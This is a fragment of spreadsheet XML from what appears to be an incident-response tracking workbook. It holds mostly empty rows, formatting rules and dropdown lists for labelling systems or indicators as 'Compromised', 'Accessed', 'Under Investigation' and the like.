      <c r="B6" s="27"/>
      <c r="C6" s="28"/>
      <c r="D6" s="27"/>
      <c r="E6" s="27"/>
      <c r="F6" s="29"/>
      <c r="G6" s="29"/>
      <c r="H6" s="29"/>
      <c r="I6" s="27"/>
      <c r="J6" s="27"/>
      <c r="K6" s="27"/>
      <c r="L6" s="27"/>
      <c r="M6" s="27"/>
      <c r="N6" s="22"/>
    </row>
    <row r="7" spans="1:15" ht="15.75" customHeight="1">
      <c r="A7" s="1"/>
      <c r="B7" s="27"/>
      <c r="C7" s="28"/>
      <c r="D7" s="27"/>
      <c r="E7" s="27"/>
      <c r="F7" s="29"/>
      <c r="G7" s="29"/>
      <c r="H7" s="30"/>
      <c r="I7" s="27"/>
      <c r="J7" s="27"/>
      <c r="K7" s="27"/>
      <c r="L7" s="27"/>
      <c r="M7" s="27"/>
      <c r="N7" s="22"/>
      <c r="O7" s="1"/>
    </row>
    <row r="8" spans="1:15" ht="15.75" customHeight="1">
      <c r="A8" s="1"/>
      <c r="B8" s="27"/>
      <c r="C8" s="28"/>
      <c r="D8" s="27"/>
      <c r="E8" s="27"/>
      <c r="F8" s="29"/>
      <c r="G8" s="29"/>
      <c r="H8" s="29"/>
      <c r="I8" s="27"/>
      <c r="J8" s="27"/>
      <c r="K8" s="27"/>
      <c r="L8" s="27"/>
      <c r="M8" s="27"/>
      <c r="N8" s="22"/>
    </row>
    <row r="9" spans="1:15" ht="15.75" customHeight="1">
      <c r="A9" s="1"/>
      <c r="B9" s="27"/>
      <c r="C9" s="28"/>
      <c r="D9" s="27"/>
      <c r="E9" s="27"/>
      <c r="F9" s="29"/>
      <c r="G9" s="29"/>
      <c r="H9" s="29"/>
      <c r="I9" s="27"/>
      <c r="J9" s="27"/>
      <c r="K9" s="27"/>
      <c r="L9" s="27"/>
      <c r="M9" s="27"/>
      <c r="N9" s="22"/>
      <c r="O9" s="1"/>
    </row>
    <row r="10" spans="1:15" ht="15.75" customHeight="1">
      <c r="A10" s="1"/>
      <c r="B10" s="27"/>
      <c r="C10" s="28"/>
      <c r="D10" s="27"/>
      <c r="E10" s="27"/>
      <c r="F10" s="29"/>
      <c r="G10" s="29"/>
      <c r="H10" s="30"/>
      <c r="I10" s="27"/>
      <c r="J10" s="27"/>
      <c r="K10" s="27"/>
      <c r="L10" s="27"/>
      <c r="M10" s="27"/>
      <c r="N10" s="22"/>
      <c r="O10" s="1"/>
    </row>
    <row r="11" spans="1:15" ht="15.75" customHeight="1">
      <c r="A11" s="1"/>
      <c r="B11" s="27"/>
      <c r="C11" s="28"/>
      <c r="D11" s="27"/>
      <c r="E11" s="31"/>
      <c r="F11" s="32"/>
      <c r="G11" s="27"/>
      <c r="H11" s="30"/>
      <c r="I11" s="27"/>
      <c r="J11" s="27"/>
      <c r="K11" s="27"/>
      <c r="L11" s="27"/>
      <c r="M11" s="27"/>
      <c r="N11" s="22"/>
      <c r="O11" s="1"/>
    </row>
    <row r="12" spans="1:15" ht="15.75" customHeight="1">
      <c r="A12" s="1"/>
      <c r="B12" s="27"/>
      <c r="C12" s="28"/>
      <c r="D12" s="27"/>
      <c r="E12" s="27"/>
      <c r="F12" s="29"/>
      <c r="G12" s="29"/>
      <c r="H12" s="29"/>
      <c r="I12" s="27"/>
      <c r="J12" s="27"/>
      <c r="K12" s="27"/>
      <c r="L12" s="27"/>
      <c r="M12" s="27"/>
      <c r="N12" s="22"/>
    </row>
    <row r="13" spans="1:15" ht="15.75" customHeight="1">
      <c r="A13" s="1"/>
      <c r="B13" s="27"/>
      <c r="C13" s="28"/>
      <c r="D13" s="27"/>
      <c r="E13" s="27"/>
      <c r="F13" s="29"/>
      <c r="G13" s="29"/>
      <c r="H13" s="29"/>
      <c r="I13" s="27"/>
      <c r="J13" s="27"/>
      <c r="K13" s="27"/>
      <c r="L13" s="27"/>
      <c r="M13" s="27"/>
      <c r="N13" s="22"/>
    </row>
    <row r="14" spans="1:15" ht="15.75" customHeight="1">
      <c r="A14" s="1"/>
      <c r="B14" s="27"/>
      <c r="C14" s="28"/>
      <c r="D14" s="27"/>
      <c r="E14" s="27"/>
      <c r="F14" s="29"/>
      <c r="G14" s="27"/>
      <c r="H14" s="30"/>
      <c r="I14" s="27"/>
      <c r="J14" s="27"/>
      <c r="K14" s="27"/>
      <c r="L14" s="27"/>
      <c r="M14" s="27"/>
      <c r="N14" s="22"/>
    </row>
    <row r="15" spans="1:15" ht="15.75" customHeight="1">
      <c r="A15" s="1"/>
      <c r="B15" s="27"/>
      <c r="C15" s="28"/>
      <c r="D15" s="31"/>
      <c r="E15" s="27"/>
      <c r="F15" s="29"/>
      <c r="G15" s="27"/>
      <c r="H15" s="30"/>
      <c r="I15" s="27"/>
      <c r="J15" s="27"/>
      <c r="K15" s="27"/>
      <c r="L15" s="27"/>
      <c r="M15" s="27"/>
      <c r="N15" s="22"/>
      <c r="O15" s="1"/>
    </row>
    <row r="16" spans="1:15" ht="15.75" customHeight="1">
      <c r="A16" s="1"/>
      <c r="B16" s="27"/>
      <c r="C16" s="28"/>
      <c r="D16" s="27"/>
      <c r="E16" s="27"/>
      <c r="F16" s="29"/>
      <c r="G16" s="29"/>
      <c r="H16" s="29"/>
      <c r="I16" s="27"/>
      <c r="J16" s="27"/>
      <c r="K16" s="27"/>
      <c r="L16" s="27"/>
      <c r="M16" s="27"/>
      <c r="N16" s="22"/>
    </row>
    <row r="17" spans="1:14" ht="15.75" customHeight="1">
      <c r="A17" s="1"/>
      <c r="B17" s="27"/>
      <c r="C17" s="28"/>
      <c r="D17" s="27"/>
      <c r="E17" s="27"/>
      <c r="F17" s="29"/>
      <c r="G17" s="29"/>
      <c r="H17" s="29"/>
      <c r="I17" s="27"/>
      <c r="J17" s="27"/>
      <c r="K17" s="27"/>
      <c r="L17" s="27"/>
      <c r="M17" s="27"/>
      <c r="N17" s="22"/>
    </row>
    <row r="18" spans="1:14" ht="15.75" customHeight="1">
      <c r="A18" s="1"/>
      <c r="B18" s="27"/>
      <c r="C18" s="28"/>
      <c r="D18" s="27"/>
      <c r="E18" s="27"/>
      <c r="F18" s="29"/>
      <c r="G18" s="29"/>
      <c r="H18" s="29"/>
      <c r="I18" s="27"/>
      <c r="J18" s="27"/>
      <c r="K18" s="27"/>
      <c r="L18" s="27"/>
      <c r="M18" s="27"/>
      <c r="N18" s="22"/>
    </row>
    <row r="19" spans="1:14" ht="15.75" customHeight="1">
      <c r="A19" s="1"/>
      <c r="B19" s="27"/>
      <c r="C19" s="28"/>
      <c r="D19" s="27"/>
      <c r="E19" s="27"/>
      <c r="F19" s="29"/>
      <c r="G19" s="29"/>
      <c r="H19" s="29"/>
      <c r="I19" s="27"/>
      <c r="J19" s="27"/>
      <c r="K19" s="27"/>
      <c r="L19" s="27"/>
      <c r="M19" s="27"/>
      <c r="N19" s="22"/>
    </row>
    <row r="20" spans="1:14" ht="15.75" customHeight="1">
      <c r="A20" s="1"/>
      <c r="B20" s="27"/>
      <c r="C20" s="28"/>
      <c r="D20" s="27"/>
      <c r="E20" s="27"/>
      <c r="F20" s="29"/>
      <c r="G20" s="29"/>
      <c r="H20" s="29"/>
      <c r="I20" s="27"/>
      <c r="J20" s="27"/>
      <c r="K20" s="27"/>
      <c r="L20" s="27"/>
      <c r="M20" s="27"/>
      <c r="N20" s="22"/>
    </row>
    <row r="21" spans="1:14" ht="15.75" customHeight="1">
      <c r="A21" s="1"/>
      <c r="B21" s="27"/>
      <c r="C21" s="28"/>
      <c r="D21" s="27"/>
      <c r="E21" s="27"/>
      <c r="F21" s="29"/>
      <c r="G21" s="29"/>
      <c r="H21" s="29"/>
      <c r="I21" s="27"/>
      <c r="J21" s="27"/>
      <c r="K21" s="27"/>
      <c r="L21" s="27"/>
      <c r="M21" s="27"/>
      <c r="N21" s="22"/>
    </row>
    <row r="22" spans="1:14" ht="15.75" customHeight="1">
      <c r="A22" s="1"/>
      <c r="B22" s="27"/>
      <c r="C22" s="28"/>
      <c r="D22" s="27"/>
      <c r="E22" s="27"/>
      <c r="F22" s="29"/>
      <c r="G22" s="29"/>
      <c r="H22" s="29"/>
      <c r="I22" s="27"/>
      <c r="J22" s="27"/>
      <c r="K22" s="27"/>
      <c r="L22" s="27"/>
      <c r="M22" s="27"/>
      <c r="N22" s="22"/>
    </row>
    <row r="23" spans="1:14" ht="15.75" customHeight="1">
      <c r="A23" s="1"/>
      <c r="B23" s="27"/>
      <c r="C23" s="28"/>
      <c r="D23" s="27"/>
      <c r="E23" s="27"/>
      <c r="F23" s="29"/>
      <c r="G23" s="29"/>
      <c r="H23" s="29"/>
      <c r="I23" s="27"/>
      <c r="J23" s="27"/>
      <c r="K23" s="27"/>
      <c r="L23" s="27"/>
      <c r="M23" s="27"/>
      <c r="N23" s="22"/>
    </row>
    <row r="24" spans="1:14" ht="15.75" customHeight="1">
      <c r="A24" s="1"/>
      <c r="B24" s="27"/>
      <c r="C24" s="28"/>
      <c r="D24" s="27"/>
      <c r="E24" s="27"/>
      <c r="F24" s="29"/>
      <c r="G24" s="29"/>
      <c r="H24" s="29"/>
      <c r="I24" s="27"/>
      <c r="J24" s="27"/>
      <c r="K24" s="27"/>
      <c r="L24" s="27"/>
      <c r="M24" s="27"/>
      <c r="N24" s="22"/>
    </row>
    <row r="25" spans="1:14" ht="15.75" customHeight="1">
      <c r="A25" s="1"/>
      <c r="B25" s="27"/>
      <c r="C25" s="28"/>
      <c r="D25" s="27"/>
      <c r="E25" s="27"/>
      <c r="F25" s="29"/>
      <c r="G25" s="29"/>
      <c r="H25" s="29"/>
      <c r="I25" s="27"/>
      <c r="J25" s="27"/>
      <c r="K25" s="27"/>
      <c r="L25" s="27"/>
      <c r="M25" s="27"/>
      <c r="N25" s="22"/>
    </row>
    <row r="26" spans="1:14" ht="15.75" customHeight="1">
      <c r="A26" s="1"/>
      <c r="B26" s="27"/>
      <c r="C26" s="28"/>
      <c r="D26" s="27"/>
      <c r="E26" s="27"/>
      <c r="F26" s="29"/>
      <c r="G26" s="29"/>
      <c r="H26" s="29"/>
      <c r="I26" s="27"/>
      <c r="J26" s="27"/>
      <c r="K26" s="27"/>
      <c r="L26" s="27"/>
      <c r="M26" s="27"/>
      <c r="N26" s="22"/>
    </row>
  </sheetData>
  <customSheetViews>
    <customSheetView guid="{D8808D7D-FBA0-4346-9CD4-3452A3DBA6C5}" filter="1" showAutoFilter="1">
      <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
      <autoFilter ref="B2:N12" xr:uid="{6BCFC546-7A7A-42A5-B453-085D653A96EF}"/>
    </customSheetView>
    <customSheetView guid="{66395941-3122-440A-B522-6E95805F6823}" filter="1" showAutoFilter="1">
      <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
      <autoFilter ref="B2:N26" xr:uid="{7370DB38-A78D-4F8F-9506-854FAF7185D3}">
        <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="B2:N26">
          <sortCondition ref="D2:D26"/>
        </sortState>
      </autoFilter>
    </customSheetView>
  </customSheetViews>
  <conditionalFormatting sqref="D2">
    <cfRule type="expression" dxfId="23" priority="8">
      <formula>#REF!&lt;&gt;""</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D2:E26">
    <cfRule type="expression" dxfId="22" priority="6">
      <formula>COUNTIF(D:D,D2)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K3:K26">
    <cfRule type="cellIs" dxfId="21" priority="1" operator="equal">
      <formula>"Compromised"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="20" priority="2" operator="equal">
      <formula>"Accessed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="19" priority="3" operator="equal">
      <formula>"Under Investigation"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="18" priority="4" operator="equal">
      <formula>"Out of Scope"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="17" priority="5" operator="equal">
      <formula>"No Sign of Compromise"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="Compromised - malware, tools, config changes; Accessed - confirmed unauthorized access; Potentially Accessed - suspected unauthorized access" sqref="K3:K26" xr:uid="{00000000-0002-0000-0400-000000000000}">
      <formula1>"Compromised,Accessed,Under Investigation,No Sign of Compromise,Out of Scope"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90000"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:O12"/>
  <sheetViews>
    <sheetView showGridLines="0" topLeftCell="B1" workbookViewId="0">
      <selection activeCell="F3" sqref="F3:N7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="13.44140625" customWidth="1"/>
    <col min="3" max="3" width="11.6640625" customWidth="1"/>
    <col min="4" max="4" width="12.44140625" customWidth="1"/>
    <col min="5" max="5" width="11.109375" customWidth="1"/>
    <col min="6" max="6" width="20.33203125" customWidth="1"/>
    <col min="7" max="7" width="15.109375" customWidth="1"/>
    <col min="9" max="9" width="19.44140625" customWidth="1"/>
    <col min="10" max="10" width="26.109375" customWidth="1"/>
    <col min="11" max="11" width="17.44140625" customWidth="1"/>
    <col min="12" max="13" width="24.33203125" customWidth="1"/>
    <col min="14" max="14" width="64.44140625" customWidth="1"/>
    <col min="15" max="15" width="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="15.75" customHeight="1">
      <c r="A1" s="1"/>
      <c r="B1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="24"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
      <c r="K1" s="1"/>
      <c r="L1" s="1"/>
      <c r="M1" s="1"/>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
    </row>
    <row r="2" spans="1:15" ht="15.75" customHeight="1">
      <c r="A2" s="1"/>
      <c r="B2" s="17" t="s">
        <v>35</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>24</v>
      </c>
      <c r="D2" s="17" t="s">
        <v>56</v>
      </c>
      <c r="E2" s="18" t="s">
        <v>57</v>
      </c>
      <c r="F2" s="18" t="s">
        <v>58</v>
      </c>
      <c r="G2" s="18" t="s">
        <v>59</v>
      </c>
      <c r="H2" s="26" t="s">
        <v>48</v>
      </c>
      <c r="I2" s="18" t="s">
        <v>60</v>
      </c>
      <c r="J2" s="18" t="s">
        <v>52</v>
      </c>
      <c r="K2" s="18" t="s">
        <v>53</v>
      </c>
      <c r="L2" s="18" t="s">
        <v>54</v>
      </c>
      <c r="M2" s="18" t="s">
        <v>55</v>
      </c>
      <c r="N2" s="33" t="s">
        <v>26</v>
      </c>
      <c r="O2" s="1"/>
    </row>
    <row r="3" spans="1:15" ht="15.75" customHeight="1">
      <c r="A3" s="1"/>
      <c r="B3" s="34"/>
      <c r="C3" s="35"/>
      <c r="D3" s="34"/>
      <c r="E3" s="34" t="s">
        <v>61</v>
      </c>
      <c r="F3" s="34"/>
      <c r="G3" s="34"/>
      <c r="H3" s="34"/>
      <c r="I3" s="34"/>
      <c r="J3" s="34"/>
      <c r="K3" s="36"/>
      <c r="L3" s="107"/>
      <c r="M3" s="34"/>
      <c r="N3" s="22"/>
    </row>
    <row r="4" spans="1:15" ht="15.75" customHeight="1">
      <c r="A4" s="1"/>
      <c r="B4" s="34"/>
      <c r="C4" s="35"/>
      <c r="D4" s="34"/>
      <c r="E4" s="34" t="s">
        <v>62</v>
      </c>
      <c r="F4" s="34"/>
      <c r="G4" s="34"/>
      <c r="H4" s="34"/>
      <c r="I4" s="34"/>
      <c r="J4" s="34"/>
      <c r="K4" s="36"/>
      <c r="L4" s="108"/>
      <c r="M4" s="34"/>
      <c r="O4" s="1"/>
    </row>
    <row r="5" spans="1:15" ht="15.75" customHeight="1">
      <c r="A5" s="1"/>
      <c r="B5" s="34"/>
      <c r="C5" s="35"/>
      <c r="D5" s="34"/>
      <c r="E5" s="34" t="s">
        <v>63</v>
      </c>
      <c r="F5" s="34"/>
      <c r="G5" s="34"/>
      <c r="H5" s="34"/>
      <c r="I5" s="34"/>
      <c r="J5" s="34"/>
      <c r="K5" s="36"/>
      <c r="L5" s="109"/>
      <c r="M5" s="34"/>
      <c r="N5" s="22"/>
    </row>
    <row r="6" spans="1:15" ht="15.75" customHeight="1">
      <c r="A6" s="1"/>
      <c r="B6" s="34"/>
      <c r="C6" s="35"/>
      <c r="D6" s="34"/>
      <c r="E6" s="34" t="s">
        <v>64</v>
      </c>
      <c r="F6" s="34"/>
      <c r="G6" s="34"/>
      <c r="H6" s="34"/>
      <c r="I6" s="34"/>
      <c r="J6" s="34"/>
      <c r="K6" s="36"/>
      <c r="L6" s="107"/>
      <c r="M6" s="34"/>
      <c r="N6" s="22"/>
    </row>
    <row r="7" spans="1:15" ht="15.75" customHeight="1">
      <c r="A7" s="1"/>
      <c r="B7" s="34"/>
      <c r="C7" s="35"/>
      <c r="D7" s="34"/>
      <c r="E7" s="34" t="s">
        <v>65</v>
      </c>
      <c r="F7" s="34"/>
      <c r="G7" s="34"/>
      <c r="H7" s="34"/>
      <c r="I7" s="34"/>
      <c r="J7" s="34"/>
      <c r="K7" s="36"/>
      <c r="L7" s="109"/>
      <c r="M7" s="34"/>
      <c r="N7" s="22"/>
      <c r="O7" s="1"/>
    </row>
    <row r="8" spans="1:15" ht="15.75" customHeight="1">
      <c r="B8" s="34"/>
      <c r="C8" s="35"/>
      <c r="D8" s="35"/>
      <c r="E8" s="34" t="s">
        <v>66</v>
      </c>
      <c r="F8" s="34"/>
      <c r="G8" s="34"/>
      <c r="H8" s="34"/>
      <c r="I8" s="34"/>
      <c r="J8" s="34"/>
      <c r="K8" s="36"/>
      <c r="L8" s="34"/>
      <c r="M8" s="34"/>
      <c r="N8" s="22"/>
      <c r="O8" s="1"/>
    </row>
    <row r="9" spans="1:15" ht="15.75" customHeight="1">
      <c r="B9" s="34"/>
      <c r="C9" s="35"/>
      <c r="D9" s="35"/>
      <c r="E9" s="34" t="s">
        <v>67</v>
      </c>
      <c r="F9" s="34"/>
      <c r="G9" s="34"/>
      <c r="H9" s="34"/>
      <c r="I9" s="34"/>
      <c r="J9" s="34"/>
      <c r="K9" s="36"/>
      <c r="L9" s="34"/>
      <c r="M9" s="34"/>
      <c r="N9" s="22"/>
    </row>
    <row r="10" spans="1:15" ht="15.75" customHeight="1">
      <c r="B10" s="34"/>
      <c r="C10" s="34"/>
      <c r="D10" s="34"/>
      <c r="E10" s="34" t="s">
        <v>68</v>
      </c>
      <c r="F10" s="34"/>
      <c r="G10" s="34"/>
      <c r="H10" s="34"/>
      <c r="I10" s="34"/>
      <c r="J10" s="34"/>
      <c r="K10" s="36"/>
      <c r="L10" s="34"/>
      <c r="M10" s="34"/>
      <c r="N10" s="22"/>
    </row>
    <row r="11" spans="1:15" ht="15.75" customHeight="1">
      <c r="B11" s="34"/>
      <c r="C11" s="34"/>
      <c r="D11" s="34"/>
      <c r="E11" s="34" t="s">
        <v>69</v>
      </c>
      <c r="F11" s="34"/>
      <c r="G11" s="34"/>
      <c r="H11" s="34"/>
      <c r="I11" s="34"/>
      <c r="J11" s="34"/>
      <c r="K11" s="36"/>
      <c r="L11" s="34"/>
      <c r="M11" s="34"/>
      <c r="N11" s="22"/>
    </row>
    <row r="12" spans="1:15" ht="15.75" customHeight="1">
      <c r="B12" s="34"/>
      <c r="C12" s="34"/>
      <c r="D12" s="34"/>
      <c r="E12" s="34" t="s">
        <v>70</v>
      </c>
      <c r="F12" s="34"/>
      <c r="G12" s="34"/>
      <c r="H12" s="34"/>
      <c r="I12" s="34"/>
      <c r="J12" s="34"/>
      <c r="K12" s="36"/>
      <c r="L12" s="34"/>
      <c r="M12" s="34"/>
      <c r="N12" s="22"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="F2:G2">
    <cfRule type="expression" dxfId="16" priority="1">
      <formula>COUNTIF(F:F,F2)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations disablePrompts="1" count="1">
    <dataValidation type="list" allowBlank="1" sqref="K3:K12" xr:uid="{00000000-0002-0000-0500-000000000000}">
      <formula1>"Compromised,Exposed,Under Investigation,Threat Actor Created,Out of Scope"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90000"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:O12"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <selection activeCell="G4" sqref="G4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="13.44140625" customWidth="1"/>
    <col min="3" max="3" width="11.6640625" customWidth="1"/>
    <col min="4" max="4" width="12.33203125" customWidth="1"/>
    <col min="5" max="5" width="14.6640625" customWidth="1"/>
    <col min="6" max="6" width="11.44140625" customWidth="1"/>
    <col min="7" max="7" width="14" customWidth="1"/>
    <col min="8" max="8" width="26" customWidth="1"/>
    <col min="9" max="9" width="27.44140625" customWidth="1"/>
    <col min="10" max="10" width="37.109375" customWidth="1"/>
    <col min="11" max="12" width="22.6640625" customWidth="1"/>
    <col min="13" max="13" width="20.109375" customWidth="1"/>
    <col min="14" max="14" width="64.44140625" customWidth="1"/>
    <col min="15" max="15" width="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="15.75" customHeight="1">
      <c r="A1" s="1"/>
      <c r="B1" s="1"/>
      <c r="C1" s="23"/>
      <c r="D1" s="23"/>
      <c r="E1" s="23"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
      <c r="K1" s="1"/>
      <c r="L1" s="1"/>
      <c r="M1" s="1"/>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
    </row>
    <row r="2" spans="1:15" ht="15.75" customHeight="1">
      <c r="A2" s="1"/>
      <c r="B2" s="44" t="s">
        <v>35</v>
      </c>
      <c r="C2" s="45" t="s">
        <v>24</v>
      </c>
      <c r="D2" s="37" t="s">
        <v>56</v>
      </c>
      <c r="E2" s="37" t="s">
        <v>53</v>
      </c>
      <c r="F2" s="38" t="s">
        <v>71</v>
      </c>
      <c r="G2" s="38" t="s">
        <v>89</v>
      </c>
      <c r="H2" s="38" t="s">
        <v>73</v>
      </c>
      <c r="I2" s="38" t="s">
        <v>51</v>
      </c>
      <c r="J2" s="38" t="s">
        <v>42</v>
      </c>
      <c r="K2" s="38" t="s">
        <v>54</v>
      </c>
      <c r="L2" s="38" t="s">
        <v>55</v>
      </c>
      <c r="M2" s="38" t="s">
        <v>43</v>
      </c>
      <c r="N2" s="33" t="s">
        <v>26</v>
      </c>
      <c r="O2" s="1"/>
    </row>
    <row r="3" spans="1:15" ht="15.75" customHeight="1">
      <c r="B3" s="34"/>
      <c r="C3" s="35"/>
      <c r="D3" s="35"/>
      <c r="E3" s="34"/>
      <c r="F3" s="34" t="s">
        <v>90</v>
      </c>
      <c r="G3" s="120" t="s">
        <v>264</v>
      </c>
      <c r="H3" s="119" t="s">
        <v>262</v>
      </c>
      <c r="I3" s="75"/>
      <c r="J3" s="120" t="s">
        <v>263</v>
      </c>
      <c r="K3" s="97">
        <v>45437.043657407405</v>
      </c>
      <c r="L3" s="42"/>
      <c r="M3" s="34"/>
      <c r="N3" s="46"/>
    </row>
    <row r="4" spans="1:15" ht="15.75" customHeight="1">
      <c r="B4" s="34"/>
      <c r="C4" s="35"/>
      <c r="D4" s="35"/>
      <c r="E4" s="35"/>
      <c r="F4" s="34" t="s">
        <v>91</v>
      </c>
      <c r="G4" s="34"/>
      <c r="H4" s="34"/>
      <c r="I4" s="34"/>
      <c r="J4" s="34"/>
      <c r="K4" s="94"/>
      <c r="L4" s="42"/>
      <c r="M4" s="34"/>
      <c r="N4" s="46"/>
      <c r="O4" s="1"/>
    </row>
    <row r="5" spans="1:15" ht="15.75" customHeight="1">
      <c r="B5" s="34"/>
      <c r="C5" s="35"/>
      <c r="D5" s="35"/>
      <c r="E5" s="35"/>
      <c r="F5" s="34" t="s">
        <v>92</v>
      </c>
      <c r="G5" s="34"/>
      <c r="H5" s="34"/>
      <c r="I5" s="34"/>
      <c r="J5" s="34"/>
      <c r="K5" s="84"/>
      <c r="L5" s="87"/>
      <c r="M5" s="34"/>
      <c r="N5" s="46"/>
    </row>
    <row r="6" spans="1:15" ht="15.75" customHeight="1">
      <c r="B6" s="34"/>
      <c r="C6" s="35"/>
      <c r="D6" s="35"/>
      <c r="E6" s="35"/>
      <c r="F6" s="34" t="s">
        <v>93</v>
      </c>
      <c r="G6" s="34"/>
      <c r="H6" s="74"/>
      <c r="I6" s="34"/>
      <c r="J6" s="34"/>
      <c r="K6" s="94"/>
      <c r="L6" s="94"/>
      <c r="M6" s="34"/>
      <c r="N6" s="46"/>
    </row>
    <row r="7" spans="1:15" ht="15.75" customHeight="1">
      <c r="B7" s="34"/>
      <c r="C7" s="43"/>
      <c r="D7" s="43"/>
      <c r="E7" s="43"/>
      <c r="F7" s="34" t="s">
        <v>94</v>
      </c>
      <c r="G7" s="34"/>
      <c r="H7" s="34"/>
      <c r="I7" s="34"/>
      <c r="J7" s="34"/>
      <c r="K7" s="84"/>
      <c r="L7" s="34"/>
      <c r="M7" s="34"/>
      <c r="N7" s="46"/>
    </row>
    <row r="8" spans="1:15" ht="15.75" customHeight="1">
      <c r="B8" s="34"/>
      <c r="C8" s="43"/>
      <c r="D8" s="43"/>
      <c r="E8" s="43"/>
      <c r="F8" s="34" t="s">
        <v>95</v>
      </c>
      <c r="G8" s="34"/>
      <c r="H8" s="83"/>
      <c r="I8" s="34"/>
      <c r="J8" s="34"/>
      <c r="K8" s="84"/>
      <c r="L8" s="34"/>
      <c r="M8" s="34"/>
      <c r="N8" s="46"/>
      <c r="O8" s="1"/>
    </row>
    <row r="9" spans="1:15" ht="15.75" customHeight="1">
      <c r="B9" s="34"/>
      <c r="C9" s="43"/>
      <c r="D9" s="43"/>
      <c r="E9" s="43"/>
      <c r="F9" s="34" t="s">
        <v>96</v>
      </c>
      <c r="G9" s="34"/>
      <c r="H9" s="34"/>
      <c r="I9" s="34"/>
      <c r="J9" s="34"/>
      <c r="K9" s="84"/>
      <c r="L9" s="34"/>
      <c r="M9" s="34"/>
      <c r="N9" s="46"/>
    </row>
    <row r="10" spans="1:15" ht="15.75" customHeight="1">
      <c r="B10" s="34"/>
      <c r="C10" s="43"/>
      <c r="D10" s="43"/>
      <c r="E10" s="43"/>
      <c r="F10" s="34" t="s">
        <v>97</v>
      </c>
      <c r="G10" s="34"/>
      <c r="H10" s="34"/>
      <c r="I10" s="34"/>
      <c r="J10" s="34"/>
      <c r="K10" s="34"/>
      <c r="L10" s="34"/>
      <c r="M10" s="34"/>
      <c r="N10" s="46"/>
    </row>
    <row r="11" spans="1:15" ht="15.75" customHeight="1">
      <c r="B11" s="34"/>
      <c r="C11" s="43"/>
      <c r="D11" s="43"/>
      <c r="E11" s="43"/>
      <c r="F11" s="34" t="s">
        <v>98</v>
      </c>
      <c r="G11" s="34"/>
      <c r="H11" s="34"/>
      <c r="I11" s="34"/>
      <c r="J11" s="34"/>
      <c r="K11" s="34"/>
      <c r="L11" s="34"/>
      <c r="M11" s="34"/>
      <c r="N11" s="46"/>
    </row>
    <row r="12" spans="1:15" ht="15.75" customHeight="1">
      <c r="B12" s="34"/>
      <c r="C12" s="43"/>
      <c r="D12" s="43"/>
      <c r="E12" s="43"/>
      <c r="F12" s="34" t="s">
        <v>99</v>
      </c>
      <c r="G12" s="34"/>
      <c r="H12" s="34"/>
      <c r="I12" s="34"/>
      <c r="J12" s="34"/>
      <c r="K12" s="34"/>
      <c r="L12" s="34"/>
      <c r="M12" s="34"/>
      <c r="N12" s="46"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="H2">
    <cfRule type="expression" dxfId="15" priority="1">
      <formula>COUNTIF(H:H,H2)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" sqref="E3:E12" xr:uid="{00000000-0002-0000-0700-000000000000}">
      <formula1>"Confirmed,Suspicious,Under Investigation,Unrelated"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90000"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:Q12"/>
  <sheetViews>
    <sheetView showGridLines="0" topLeftCell="D1" workbookViewId="0">
      <selection activeCell="G3" sqref="G3:M3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="13.44140625" customWidth="1"/>
    <col min="3" max="3" width="11.6640625" customWidth="1"/>
    <col min="4" max="4" width="12.33203125" customWidth="1"/>
    <col min="5" max="5" width="14.6640625" customWidth="1"/>
    <col min="6" max="6" width="11.44140625" customWidth="1"/>
    <col min="7" max="7" width="14" customWidth="1"/>
    <col min="8" max="8" width="26.33203125" customWidth="1"/>
    <col min="9" max="9" width="36" customWidth="1"/>
    <col min="10" max="12" width="11" customWidth="1"/>
    <col min="13" max="13" width="25.44140625" customWidth="1"/>
    <col min="14" max="14" width="11.6640625" customWidth="1"/>
    <col min="15" max="15" width="19.77734375" customWidth="1"/>
    <col min="16" max="16" width="64.44140625" customWidth="1"/>
    <col min="17" max="17" width="3" customWidth="1"/>
